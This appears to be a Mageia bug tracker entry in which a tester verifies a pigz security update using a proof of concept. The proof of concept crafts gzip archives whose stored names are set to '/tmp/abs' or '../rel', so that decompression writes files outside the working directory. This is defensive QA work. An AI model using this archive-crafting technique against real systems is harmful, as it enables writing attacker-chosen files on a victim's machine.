Bug 17895

Created attachment 7522 [details]
PoC for pigz vunerability

Taken from https://bugs.debian.org/cgi-bin/bugreport.cgi?=774978

CC: (none) => tarazed25

mga5  x86_64  Mate

Installed pigz
Ran the PoC check attached to show the vulnerability:
[lcl@vega ~/qa]$ touch tmpabs
[lcl@vega ~/qa]$ gzip -c tmpabs | sed 's|tmpabs|/tmp/abs|g' > abs.gz
[lcl@vega ~/qa]$ rm tmpabs
[lcl@vega ~/qa]$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
[lcl@vega ~/qa]$ pigz -d -N abs.gz
[lcl@vega ~/qa]$ ls /tmp/abs
/tmp/abs
[lcl@vega ~/qa]$ touch xxxrel
[lcl@vega ~/qa]$ gzip -c xxxrel | sed 's|xxxrel|../rel|g' > rel.gz
[lcl@vega ~/qa]$ rm xxxrel
rm: remove regular empty file âxxxrelâ? y
[lcl@vega ~/qa]$ ls ../rel
ls: cannot access ../rel: No such file or directory
[lcl@vega ~/qa]$ unpigz -N rel.gz
[lcl@vega ~/qa]$ ls ../rel
../rel

Installed the update and ran the check again.

[lcl@vega ~/qa]$ touch tmpabs
[lcl@vega ~/qa]$ gzip -c tmpabs | sed 's|tmpabs|/tmp/abs|g' > abs.gz
[lcl@vega ~/qa]$ rm tmpabs
rm: remove regular empty file âtmpabsâ? y
[lcl@vega ~/qa]$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
[lcl@vega ~/qa]$ unpigz -N abs.gz
[lcl@vega ~/qa]$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
[lcl@vega ~/qa]$ rm ../rel
rm: cannot remove â../relâ: No such file or directory
[lcl@vega ~/qa]$ touch xxxrel
[lcl@vega ~/qa]$ gzip -c xxxrel | sed 's|xxxrel|../rel|g' > rel.gz
[lcl@vega ~/qa]$ rm xxxrel
rm: remove regular empty file âxxxrelâ? y
[lcl@vega ~/qa]$ ls ../rel
ls: cannot access ../rel: No such file or directory
[lcl@vega ~/qa]$ unpigz -N rel.gz
[lcl@vega ~/qa]$ ls ../rel
ls: cannot access ../rel: No such file or directory

Compressed a local file and uncompressed it and examined the first few lines.

[lcl@vega ~/qa]$ ls -l mod
-rw-r--r-- 1 lcl lcl 129185 Mar  8 00:19 mod
[lcl@vega ~/qa]$ less mod
[ 7495.015595] audit: type=1130 audit(1456699658.850:5414): pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=systemd-networkd comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
[ 7525.053681] audit: type=1131 audit(1456699688.889:5415): pid=1 uid=0 auid=429
[lcl@vega ~/qa]$ ls -l mod.gz
-rw-r--r-- 1 lcl lcl 11424 Feb 29 12:28 mod.gz
[lcl@vega ~/qa]$ pigz -d mod.gz
[lcl@vega ~/qa]$ ls -l mod
-rw-r--r-- 1 lcl lcl 129185 Feb 29 12:28 mod
[lcl@vega ~/qa]$ less mod
[ 7495.015595] audit: type=1130 audit(1456699658.850:5414): pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=systemd-networkd comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
[ 7525.053681] audit: type=1131 audit(1456699688.889:5415): pid=1 uid=0 auid=429

The update is fine for 64-bits.

mga5  i586 virtualbox  Mate

Ran the before and after tests based on the PoC and saw exactly the same behaviour as in the 64bit test.

After update:
$ touch base
$ gzip -c base | sed 's|base|/tmp/abs|g' > abs.gz
$ rm base
rm: remove regular empty file âbaseâ? y
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ rm ../rel
rm: remove regular empty file â../relâ? y
$ touch base
$ gzip -c base | sed 's|base|../rel|g' > rel.gz
$ rm base
rm: remove regular empty file âbaseâ? y
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
ls: cannot access ../rel: No such file or directory

Validating this.

An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2016-0104.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED